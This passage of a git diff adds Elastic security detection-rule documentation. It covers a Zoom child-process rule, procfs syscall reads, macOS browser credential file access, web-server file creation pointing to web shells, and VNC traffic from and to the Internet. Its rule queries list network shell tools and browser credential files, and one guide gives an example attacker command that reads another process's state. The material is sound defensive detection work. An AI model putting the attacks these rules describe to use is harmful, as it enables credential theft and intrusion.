process.executable : "*/zoom" and + not process.parent.name : "zoom" + ) or + ( + host.os.type in ("macos", "linux") and + ( + (host.os.type == "macos" and + process.parent.executable : "*/zoom.us.app/Contents/MacOS/zoom.us") or + (host.os.type == "linux" and + process.parent.name : "zoom") + ) and + process.name : ( + "sh", "bash", "zsh", "dash", "ksh", "fish", "ash", "mksh", "tsh", "tcsh", "pwsh", + "python*", "perl*", "ruby*", "php*", "lua*", "node", "nodejs", "osascript", + "curl", "nscurl", "wget", "nc", "ncat", "netcat", "netcat.openbsd", "netcat.traditional", + "nc.openbsd", "nc.traditional", "socat", "openssl", + "chmod", "xattr" + ) and + not ( + host.os.type == "linux" and process.name in ("sh", "bash") and + process.args : ( + "lspci", + "pacmd --version", + "pacmd list-sinks |grep 'name:\\|module:'", + "pipewire --version", + "ls /usr/share/xdg-desktop-portal/portals/", + "/usr/libexec/xdg-desktop-portal --version", + "cat /proc/sys/kernel/pid_max" + ) + ) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: AppleScript +** ID: T1059.002 +** Reference URL: https://attack.mitre.org/techniques/T1059/002/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-reading-of-procfs-syscall-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-reading-of-procfs-syscall-file.asciidoc new file mode 100644 index 0000000000..d245f17b42 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-reading-of-procfs-syscall-file.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-32-suspicious-reading-of-procfs-syscall-file]] +=== Suspicious Reading of procfs Syscall File + +This rule detects command lines that reference another process or thread's procfs syscall file. The "/proc//syscall" interface exposes the current syscall arguments, stack pointer, and instruction pointer, which can support process discovery and preparation for process injection. Self and thread-self aliases are excluded. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://man7.org/linux/man-pages/man5/proc_pid_syscall.5.html +* https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Platform: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Crowdstrike +* Data Source: SentinelOne +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Reading of procfs Syscall File* + + +This rule detects Linux utilities reading another process or thread’s `/proc//syscall` file, which exposes its active system call, arguments, stack pointer, and instruction pointer and can support process discovery or injection preparation. An attacker may repeatedly run `cat /proc/1234/syscall` to inspect a privileged service’s execution state before selecting it as an injection target. + + +*Possible investigation steps* + + +- Resolve the referenced PID to its executable, owner, privileges, container or namespace, and service role to determine why it was targeted. +- Review the reader’s full command line, parent process, user, working directory, executable path, hash, signature, and surrounding process tree for evidence of scripts, shells, or unauthorized tooling. +- Correlate nearby activity for repeated procfs enumeration, `ptrace` use, debugger attachment, access to `/proc//mem` or `/proc//maps`, suspicious signal delivery, and credential or privilege changes. +- Compare the activity with host baselines and approved monitoring or troubleshooting workflows, then examine whether the same user, binary, or command pattern appears on other systems. +- If unexplained or malicious, isolate the host, preserve process and audit telemetry, terminate unauthorized processes, revoke exposed credentials, and investigate the initial access and persistence mechanism. + + +*False positive analysis* + + +- An administrator troubleshooting a stalled or high-resource process may read its `/proc//syscall` file; confirm the target PID, initiating user, parent shell, timing, and alignment with an approved support activity. +- An authorized diagnostic or monitoring script may periodically inspect process syscall state using standard Linux utilities; verify the script path, owner, execution schedule, expected target processes, and consistency with the host’s established baseline. + + +*Response and remediation* + + +- Isolate the affected Linux host or container while preserving volatile evidence, including the reader process, targeted PID, process tree, open files, network connections, and relevant `/proc` artifacts. +- Terminate unauthorized processes and remove persistence associated with the activity, including malicious systemd units, cron entries, shell startup modifications, container hooks, kernel modules, and altered binaries. +- Revoke credentials or tokens accessible to the implicated accounts and processes, rotate affected secrets, and review privileged accounts for unauthorized SSH keys or sudo configuration changes. +- Escalate immediately to incident response if the activity includes `ptrace`, access to `/proc//mem` or `/proc//maps`, code injection indicators, privileged-process targeting, credential theft, or similar behavior on multiple systems. +- Rebuild compromised hosts or containers from verified images, restore validated data and configuration, patch exploited software, and confirm that unauthorized files, processes, accounts, and connections are absent before reconnecting them. +- Harden the environment by restricting procfs visibility with `hidepid`, enforcing least privilege and ptrace restrictions, strengthening SELinux or AppArmor policies, limiting debugging tools, and monitoring repeated access to other processes’ procfs files. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "ProcessRollup2") and +( + process.name in ( + "cat", "less", "more", "head", "tail", "nano", "vi", "vim", "strings", "nvim", "vim.basic", + "vim.tiny", "od", "hexdump", "xxd", "hx", "hexedit", "pager", "tr" + ) or + ( + process.name in ( + "find", "awk", "gawk", "mawk", "nawk", "grep", "fgrep", "rgrep", "xargs", "sed", "tee" + ) and + process.args_count <= 20 + ) +) and +process.command_line like "*/proc/*/syscall*" and +not ( + process.command_line like ("*/proc/self/syscall*", "*/proc/thread-self/syscall*") or + process.args like "/proc/*/syscall/comm" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Process Discovery +** ID: T1057 +** Reference URL: https://attack.mitre.org/techniques/T1057/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-web-browser-sensitive-file-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-web-browser-sensitive-file-access.asciidoc new file mode 100644 index 0000000000..c0c08eb43e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-suspicious-web-browser-sensitive-file-access.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-32-suspicious-web-browser-sensitive-file-access]] +=== Suspicious Web Browser Sensitive File Access + +Identifies the access or file open of web browser sensitive files by an untrusted/unsigned process or osascript. Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securelist.com/calisto-trojan-for-macos/86543/ + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 216 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Web Browser Sensitive File Access* + + +Web browsers store sensitive data like cookies and login credentials in specific files. Adversaries exploit this by accessing these files using untrusted or unsigned processes, potentially stealing credentials. The detection rule identifies such unauthorized access on macOS by monitoring file access events, focusing on untrusted processes or scripts, and excluding known safe executables, thus flagging potential credential theft attempts. + + +*Possible investigation steps* + + +- Review the process executable path and name to determine if it is a known legitimate application or script, focusing on those not signed by trusted entities or identified as osascript. +- Check the process code signature details to verify if the process is unsigned or untrusted, which could indicate malicious activity. +- Investigate the user account associated with the process to determine if there is any unusual or unauthorized activity, such as unexpected logins or privilege escalations. +- Examine the file access event details, including the specific sensitive file accessed (e.g., cookies.sqlite, logins.json), to assess the potential impact on credential security. +- Correlate the event with other security alerts or logs from the same host or user to identify any patterns or additional suspicious activities that might indicate a broader compromise. +- Verify if the process executable path matches any known safe paths, such as the excluded path for the Elastic Endpoint, to rule out false positives. + + +*False positive analysis* + + +- Access by legitimate applications: Some legitimate applications may access browser files for valid reasons, such as backup or synchronization tools. Users can create exceptions for these applications by adding their code signatures to the exclusion list. +- Developer or testing scripts: Developers might use scripts like osascript for testing purposes, which could trigger the rule. To manage this, users can whitelist specific scripts or processes used in development environments. +- Security software interactions: Security tools might access browser files as part of their scanning or monitoring activities. Users should verify the legitimacy of these tools and add them to the exclusion list if they are trusted. +- System maintenance tasks: Automated system maintenance tasks might access browser files. Users can identify these tasks and exclude them if they are part of routine system operations and deemed safe. + + +*Response and remediation* + + +- Immediately isolate the affected macOS system from the network to prevent further unauthorized access or data exfiltration. +- Terminate any untrusted or unsigned processes identified in the alert, especially those accessing sensitive browser files. +- Conduct a thorough review of the affected system's recent activity logs to identify any additional suspicious behavior or potential lateral movement. +- Change all potentially compromised credentials, focusing on those stored in the affected web browsers, and enforce multi-factor authentication where possible. +- Restore any altered or deleted sensitive files from a known good backup to ensure data integrity. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected. +- Update endpoint protection and monitoring tools to enhance detection capabilities for similar unauthorized access attempts in the future. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where event.action == "open" and host.os.type == "macos" and process.executable != null and + file.name like~ ("cookies.sqlite", + "key?.db", + "logins.json", + "Cookies", + "Cookies.binarycookies", + "Login Data") and + ((process.code_signature.trusted == false or process.code_signature.exists == false) or process.name == "osascript") and + not process.code_signature.signing_id == "org.mozilla.firefox" and +not ?Effective_process.executable like "/Library/Elastic/Endpoint/elastic-endpoint.app/Contents/MacOS/elastic-endpoint" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Web Session Cookie +** ID: T1539 +** Reference URL: https://attack.mitre.org/techniques/T1539/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Credentials from Web Browsers +** ID: T1555.003 +** Reference URL: https://attack.mitre.org/techniques/T1555/003/ +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Local System +** ID: T1005 +** Reference URL: https://attack.mitre.org/techniques/T1005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-unusual-file-creation-via-web-server.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-unusual-file-creation-via-web-server.asciidoc new file mode 100644 index 0000000000..916af6d56a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-unusual-file-creation-via-web-server.asciidoc @@ -0,0 +1,176 @@ +[[prebuilt-rule-8-19-32-unusual-file-creation-via-web-server]] +=== Unusual File Creation via Web Server + +This rule leverages the "new_terms" rule type to detect unusual file creations originating from web server processes on Linux systems. Attackers may exploit web servers to maintain persistence on a compromised system, often resulting in atypical file creations. As file creations from web server processes are common, the "new_terms" rule type approach helps to identify deviations from normal behavior. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* Domain: Web +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Tactic: Command and Control +* Tactic: Initial Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Unusual File Creation via Web Server* + + +This alert flags a Linux web server process creating or renaming a file in web content or application directories that it does not normally touch, which can reveal a compromised service writing attacker-controlled content. That matters because web-facing processes rarely need to drop new executable or template files outside normal deployment activity. A common pattern is an intruder exploiting a vulnerable upload handler or plugin to place a web shell, JSP, PHP, or script-backed page under the site root for persistent remote access. + + +*Possible investigation steps* + + +- Determine whether the file aligns with an approved deployment, plugin or theme update, package installation, or administrator change in the same time window by reviewing change records and system update history. +- Inspect the file contents, hash, ownership, permissions, and timestamps for signs of a web shell, dropped payload, hidden redirect, or script stager, and compare it with known-good application files from the same host or image. +- Review the web service's parent and child activity around the event for spawned shells, interpreters, archive extraction, or permission changes that would indicate exploitation followed by payload execution or persistence setup. +- Correlate nearby web access, reverse-proxy, and application log events to identify suspicious upload, template-edit, admin-panel, deserialization, or remote-code-execution requests immediately before the file appeared and any follow-up requests to the new file. +- Scope the compromise by searching the host and peer web servers for similarly named files, unexpected cron or systemd persistence, modified startup scripts, or outbound connections made by the web service account after the creation event. + + +*False positive analysis* + + +- Approved application deployment, patching, or first-run initialization can cause the web server or application server to create new files in the web root, so verify the event time against authorized change activity and confirm the file path, owner, and hash match the expected release contents. +- Legitimate web application features such as user uploads or automatic generation of images, media, attachments, or cache files can create new content under upload-facing directories, so review nearby web or application requests and confirm the file extension, location, and contents are consistent with normal business use. + + +*Response and remediation* + + +- Isolate the affected web server from the internet and internal network, remove it from the load balancer, and temporarily disable the compromised site or virtual host while keeping only secured management access for containment. +- Eradicate attacker persistence by deleting the malicious web shell or dropped script, removing any unauthorized cron jobs, systemd units, startup scripts, SSH keys, or writable symlinks created by the web service account, and disabling any backdoored application user or admin account. +- Restore the service to a known-good state by rebuilding the host from a trusted image or redeploying the application from clean source, recovering web content and configuration from a verified backup taken before the file appeared, and validating expected ownership and permissions across the web root. +- Rotate all secrets exposed to the host, including web application credentials, API tokens, database passwords, and TLS private keys, and invalidate active sessions or cookies if the malicious file could have intercepted user or administrator access. +- Escalate to incident response immediately if you find the same malicious file on multiple web servers, observe the web process spawning a shell or making outbound command-and-control connections, or confirm access to databases, payment data, or domain credentials. +- Harden the environment by patching the exploited CMS, plugin, framework, or server component, restricting the web service account to only required write paths, disabling script execution in upload directories, and adding detections for new executable or template files under the web root. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:linux and event.action:(creation or rename) and ( + process.name: ( + "nginx" or "apache2" or "httpd" or "caddy" or "lighttpd" or "httpd.worker" or "httpd-worker" or "httpd-prefork" or + "php-cgi" or "php-fcgi" or "php-cgi.cagefs" or "frankenphp" or "lshttpd" or "litespeed" or "openlitespeed" or + "fcgiwrap" or "uwsgi" or "daphne" or "uvicorn" or "hypercorn" or "granian" or "waitress-serve" or "flask" or + "puma" or "unicorn" or "unicorn_rails" or "thin" or "rackup" or "mongrel_rails" or "starman" or "plackup" or + "twiggy" or "hypnotoad" or "starlet" or "unitd" or "unitd-debug" or php-fpm* or lsphp* or gunicorn* or + "nginx3" or "apache" or *.cgi or *.fcgi + ) or + (process.name: "java" and file.extension: ("jsp" or "jspx" or "jspf" or "tag" or "tagx" or "war" or "ear")) or + (process.name: ("node" or "nodejs") and file.extension: ("js" or "mjs" or "cjs" or "ts" or "mts" or "cts")) or + (process.name: "dotnet" and file.extension: ("cshtml" or "razor")) or + (process.name: (mono* or xsp* or mod-mono-server* or fastcgi-mono-server*) and file.extension: ("asp" or "aspx" or "ashx" or "asmx" or "ascx" or "cshtml")) or + (process.name: python* and file.extension: ("wsgi" or "cgi" or "fcgi")) or + (process.name: ruby* and file.extension: ("erb" or "ru")) or + (process.name: perl* and file.extension: ("cgi" or "fcgi" or "psgi")) or + (process.name: lua* and file.extension: ("lua" or "luac")) +) and +file.path:( + /home/*/* or /var/www/* or /srv/www/* or /srv/http/* or /usr/share/nginx/* or /opt/zimbra/jetty* or + /usr/share/caddy/* or /usr/local/lsws/* or /opt/bitnami/* or */sites/*/files/* or /opt/easyengine/* or + */wp-content/* or */httpdocs/* or */httpsdocs/* or */htdocs/* or */wwwroot/* or */webroot/* or */cgi-bin/* or + */upload/* or */uploads/* or */images/* or */media/* or */userfiles/* or */attachments/* or + /usr/share/webapps/* or /usr/share/zabbix/* or /usr/share/phpmyadmin/* or /usr/share/phpMyAdmin/* or + /var/lib/roundcube/* or /usr/share/cacti/* or /usr/share/nagios* or /var/lib/tomcat* or /usr/share/tomcat* or + /usr/local/tomcat/* or /opt/tomcat* or /var/lib/jetty* or /usr/share/jetty* or + /usr/local/cpanel/* or /usr/local/psa* or /opt/psa/admin/* or /usr/share/webmin/* or + /usr/libexec/webmin/* or /usr/local/nginx/* or /usr/local/apache* or /usr/sap/* or /opt/rh/* or + */public_html/* or */private_html/* or */public/* or */private/* or */deployments/* or */autodeploy/* or + */dropins/* or */installedApps/* or /srv/caddy/* or /usr/local/openresty/* or */fileadmin/* or */custom_apps/* or + */vhost* or /opt/apache-tomcat* or /opt/jetty* or /usr/local/jetty* or */wildfly*/* or */jboss*/* or */glassfish/* or + */user_projects/domains/* or */resin*/webapps/* or */installedApps/* +) and +not ( + file.path:*/storage/framework/sessions/* or + (process.name:php-fpm* and file.path:(/mnt/WEB/*/public_html/tmp/templates/frontend/*.php or /mnt/WEB/*/public_html/wp-content/languages/*.json)) or + (process.name:node and (user.id>=1000 or user.id:0)) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-from-the-internet.asciidoc new file mode 100644 index 0000000000..636af5d19f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-from-the-internet.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-32-vnc-virtual-network-computing-from-the-internet]] +=== VNC (Virtual Network Computing) from the Internet + +This rule detects network events that may indicate the use of VNC traffic from the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Tactic: Command and Control +* Tactic: Initial Access +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: Fortinet +* Data Source: PAN-OS +* Data Source: pfSense +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating VNC (Virtual Network Computing) from the Internet* + + +VNC allows remote control of systems, facilitating maintenance and resource sharing. However, when exposed to the Internet, it becomes a target for attackers seeking unauthorized access. Adversaries exploit VNC for initial access or as a backdoor. The detection rule identifies suspicious VNC traffic by monitoring specific TCP ports and filtering out trusted IP ranges, flagging potential threats for further investigation. + + +*Possible investigation steps* + + +- Review the source IP address of the alert to determine if it is from an untrusted or suspicious location, as the rule filters out known trusted IP ranges. +- Check the destination IP address to confirm it belongs to an internal network (10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16) and verify if the system is authorized to receive VNC traffic. +- Analyze the network traffic logs for the specified TCP ports (5800-5810) to identify any unusual patterns or repeated access attempts that could indicate malicious activity. +- Investigate the context of the event by correlating it with other security alerts or logs to determine if there are signs of a broader attack or compromise. +- Assess the risk and impact of the potential threat by evaluating the criticality of the affected system and any sensitive data it may contain. + + +*False positive analysis* + + +- Internal testing or maintenance activities may trigger the rule if VNC is used for legitimate purposes within a controlled environment. To manage this, create exceptions for known internal IP addresses that frequently use VNC for authorized tasks. +- Automated systems or scripts that utilize VNC for routine operations might be flagged. Identify these systems and exclude their IP addresses from the rule to prevent unnecessary alerts. +- Remote workers using VPNs that route traffic through public IPs could be mistakenly identified as threats. Ensure that VPN IP ranges are included in the trusted IP list to avoid false positives. +- Misconfigured network devices that inadvertently expose VNC ports to the Internet can cause alerts. Regularly audit network configurations to ensure VNC ports are not exposed and adjust the rule to exclude known safe configurations. +- Third-party service providers accessing systems via VNC for support purposes might be flagged. Establish a list of trusted IPs for these providers and update the rule to exclude them from detection. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration. +- Terminate any active VNC sessions originating from untrusted IP addresses to cut off potential attacker access. +- Conduct a thorough review of system logs and network traffic to identify any unauthorized changes or data access that may have occurred during the VNC session. +- Reset credentials for any accounts that were accessed or could have been compromised during the unauthorized VNC session. +- Apply security patches and updates to the VNC software and any other potentially vulnerable applications on the affected system. +- Implement network segmentation to ensure that VNC services are only accessible from trusted internal networks and not exposed to the Internet. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems may be affected. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and + network.transport:tcp and destination.port >= 5800 and destination.port <= 5810 and + not source.ip:( + 10.0.0.0/8 or + 127.0.0.0/8 or + 169.254.0.0/16 or + 172.16.0.0/12 or + 192.0.0.0/24 or + 192.0.0.0/29 or + 192.0.0.8/32 or + 192.0.0.9/32 or + 192.0.0.10/32 or + 192.0.0.170/32 or + 192.0.0.171/32 or + 192.0.2.0/24 or + 192.31.196.0/24 or + 192.52.193.0/24 or + 192.168.0.0/16 or + 192.88.99.0/24 or + 224.0.0.0/4 or + 100.64.0.0/10 or + 192.175.48.0/24 or + 198.18.0.0/15 or + 198.51.100.0/24 or + 203.0.113.0/24 or + 240.0.0.0/4 or + "::1" or + "FE80::/10" or + "FF00::/8" + ) and + destination.ip:( + 10.0.0.0/8 or + 172.16.0.0/12 or + 192.168.0.0/16 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-to-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-to-the-internet.asciidoc new file mode 100644 index 0000000000..064d45c231 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-vnc-virtual-network-computing-to-the-internet.asciidoc @@ -0,0 +1,165 @@ +[[prebuilt-rule-8-19-32-vnc-virtual-network-computing-to-the-internet]] +=== VNC (Virtual Network Computing) to the Internet + +This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Tactic: Command and Control +* Tactic: Lateral Movement +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: Fortinet +* Data Source: PAN-OS +* Data Source: pfSense +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating VNC (Virtual Network Computing) to the Internet* + + +VNC is a tool that allows remote control of computers, often used by administrators for maintenance. However, when exposed to the internet, it becomes a target for attackers seeking unauthorized access. Adversaries exploit VNC to establish backdoors or gain initial access. The detection rule identifies suspicious VNC traffic by monitoring specific TCP ports and filtering out internal IP addresses, flagging potential threats when VNC is accessed from external networks. + + +*Possible investigation steps* + + +- Review the source IP address to determine if it belongs to a known internal asset or user, and verify if the access was authorized. +- Check the destination IP address to confirm if it is an external address and investigate its reputation or any known associations with malicious activity. +- Analyze the network traffic logs for the specified TCP ports (5800-5810) to identify any unusual patterns or volumes of VNC traffic. +- Correlate the VNC traffic event with other security events or logs to identify any related suspicious activities or anomalies. +- Investigate the user account associated with the VNC session to ensure it has not been compromised or misused. +- Assess the system or application logs on the destination machine for any signs of unauthorized access or changes during the time of the VNC connection. + + +*False positive analysis* + + +- Internal maintenance activities 